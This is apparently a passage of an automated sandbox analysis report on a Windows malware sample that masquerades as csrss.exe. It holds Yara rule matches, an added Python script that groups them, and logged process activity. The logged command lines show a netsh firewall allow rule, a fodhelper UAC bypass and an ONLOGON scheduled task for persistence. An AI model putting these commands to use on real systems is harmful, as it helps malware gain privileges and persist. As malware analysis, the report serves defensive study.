        Source: 40.3.csrss.exe.431bb00.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 23.3.csrss.exe.4321700.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.3d00000.2.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 10.3.kdsyitkxmS.exe.3ab0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 43.3.csrss.exe.4331420.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 40.3.csrss.exe.3d00000.5.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 43.3.csrss.exe.3d00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 40.3.csrss.exe.4331420.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 43.3.csrss.exe.431bb00.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 55.3.csrss.exe.431bb00.5.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.4321700.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 61.3.csrss.exe.431bb00.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 20.3.csrss.exe.4331420.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 4.3.kdsyitkxmS.exe.40abb00.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 50.3.csrss.exe.4321700.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth (Nextron Systems), description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, modified = 2022-12-21
        Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
        Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth (Nextron Systems), description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
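The thirty-odd rule matches above are the same two rules firing repeatedly across the analysis processes, once per unpacked region and once per memory dump. Collapsing them by rule and process is the first thing an analyst wants, and it needs a parser for the two source-identifier shapes used on this page: the unpacked-PE name (process.stage.image.address.index.raw.unpack, with the process id in decimal) and the memory-dump name (eight-digit hex process id, stage, timestamp, sixteen-digit hex address, flags, .sdmp). The script below is an added example for this report, not Joe Sandbox tooling. It assumes that the leading field of a dump name is the same analysis-process id written in hexadecimal, an inference from this page (0x1F = 31, 0x3A = 58, 0x0A = 10 and the rest all correspond to processes that also appear as .unpack sources); its input lines are constructed from entries above.

```python
"""Group the Yara matches above by rule and analysis process.

Added example for this report, not Joe Sandbox tooling. It parses the two
source-identifier shapes that appear in this section:
  <process>.<stage>.<image>.<address>.<n>.raw.unpack        (decimal process id)
  <process hex>.<stage hex>.<timestamp>.<address hex>...sdmp (hex process id)
That the dump name's leading field is the analysis-process id in hex is an
assumption inferred from this page. LINES below are constructed from entries
on the page, in both the raw extracted form and the separated form.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<kind>UNPACKEDPE|MEMORY)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.\d+\.(?P<image>.+?)\.(?P<addr>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$", re.I
)
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<addr>[0-9A-F]{16})(?:\.[0-9A-F]{8})+\.sdmp$",
    re.I,
)
# "key = value" pairs separated by ", "; values may be empty ("score = ,").
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")

LINES = [
    "Source: 58.3.csrss.exe.4331420.6.raw.unpack, type: UNPACKEDPEMatched rule: "
    "MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = "
    "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, "
    "author = Florian Roth (Nextron Systems), description = Detects suspicious "
    "malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/"
    "1212501454549741568?s=09, modified = 2022-12-21",
    "Source: 10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack, type: UNPACKEDPE | Matched rule: "
    "MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, author = Florian Roth (Nextron Systems)",
    "Source: 31.3.csrss.exe.431bb00.3.raw.unpack, type: UNPACKEDPEMatched rule: "
    "MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02",
    "Source: 10.3.kdsyitkxmS.exe.3ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: "
    "SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth "
    "(Nextron Systems), description = Detects suspicious executable with reference to "
    "a Discord attachment (often used for malware hosting on a legitimate FQDN), "
    "score = , reference = Internal Research",
    "Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000."
    "00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 "
    "date = 2021-10-12, author = Florian Roth (Nextron Systems)",
]


def parse_source(src):
    """Return (process id, image or None, address) for either identifier shape."""
    m = UNPACK_RE.match(src)
    if m:
        return int(m["pid"]), m["image"], int(m["addr"], 16)
    m = SDMP_RE.match(src)
    if m:
        return int(m["pid"], 16), None, int(m["addr"], 16)
    raise ValueError("unrecognised source identifier: " + src)


def parse_line(line):
    """One report line -> record dict, or None if it is not a rule-match line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    pid, image, addr = parse_source(m["src"])
    return {"rule": m["rule"], "pid": pid, "image": image, "addr": addr,
            "kind": m["kind"], "meta": dict(META_RE.findall(m["meta"]))}


def summarize(lines):
    """Map rule name -> sorted list of (process id, image) the rule fired in.

    Dump-based matches carry no image name; it is recovered from any unpack
    match of the same process id.
    """
    recs = [r for r in map(parse_line, lines) if r]
    images = {r["pid"]: r["image"] for r in recs if r["image"]}
    by_rule = defaultdict(set)
    for r in recs:
        by_rule[r["rule"]].add((r["pid"], images.get(r["pid"], r["image"] or "?")))
    return {rule: sorted(procs) for rule, procs in by_rule.items()}


if __name__ == "__main__":
    for rule, procs in summarize(LINES).items():
        print(rule, procs)
```

Fed the full section, this reduces the list to MAL_ME_RawDisk_Agent_Jan20_2 across the sample and every csrss.exe instance, and SUSP_PE_Discord_Attachment_Oct21_1 across the same processes, which is the actual finding: one payload, carrying an ElRawDisk user and a Discord-hosted download reference, re-unpacked in each copy of csrss.exe.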
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_by2l5cwc.djl.ps1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | File created: C:\Windows\rss
        Source: bootx64.efi.20.dr | Static PE information: No import functions for PE file found
        Source: bootmgfw.efi.20.dr | Static PE information: No import functions for PE file found
        Source: EfiGuardDxe.efi.20.dr | Static PE information: No import functions for PE file found
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesymsrv.dllj% vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinmonFS.sysZ vs kdsyitkxmS.exe
        Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedsefix.exe. vs kdsyitkxmS.exe
        Source: C:\Windows\System32\svchost.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\servicing\TrustedInstaller.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\System32\netsh.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\System32\fodhelper.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\System32\fodhelper.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exe | Section loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\shutdown.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\sc.exe | Process token adjusted: Security
        Source: kdsyitkxmS.exe | Static PE information: invalid certificate
        Source: zlib1.dll.20.dr | Static PE information: Number of sections : 11 > 10
        Source: libssp-0.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: libevent_core-2-1-7.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: libssl-1_1.dll.20.dr | Static PE information: Number of sections : 19 > 10
        Source: libgcc_s_dw2-1.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: libcrypto-1_1.dll.20.dr | Static PE information: Number of sections : 19 > 10
        Source: libevent_extra-2-1-7.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: libwinpthread-1.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: libevent-2-1-7.dll.20.dr | Static PE information: Number of sections : 18 > 10
        Source: kdsyitkxmS.exe | Virustotal: Detection: 31%
        Source: kdsyitkxmS.exe | ReversingLabs: Detection: 32%
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | File read: C:\Users\user\Desktop\kdsyitkxmS.exe
        Source: kdsyitkxmS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
        Source: unknown | Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exe | Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
        Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exe | Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
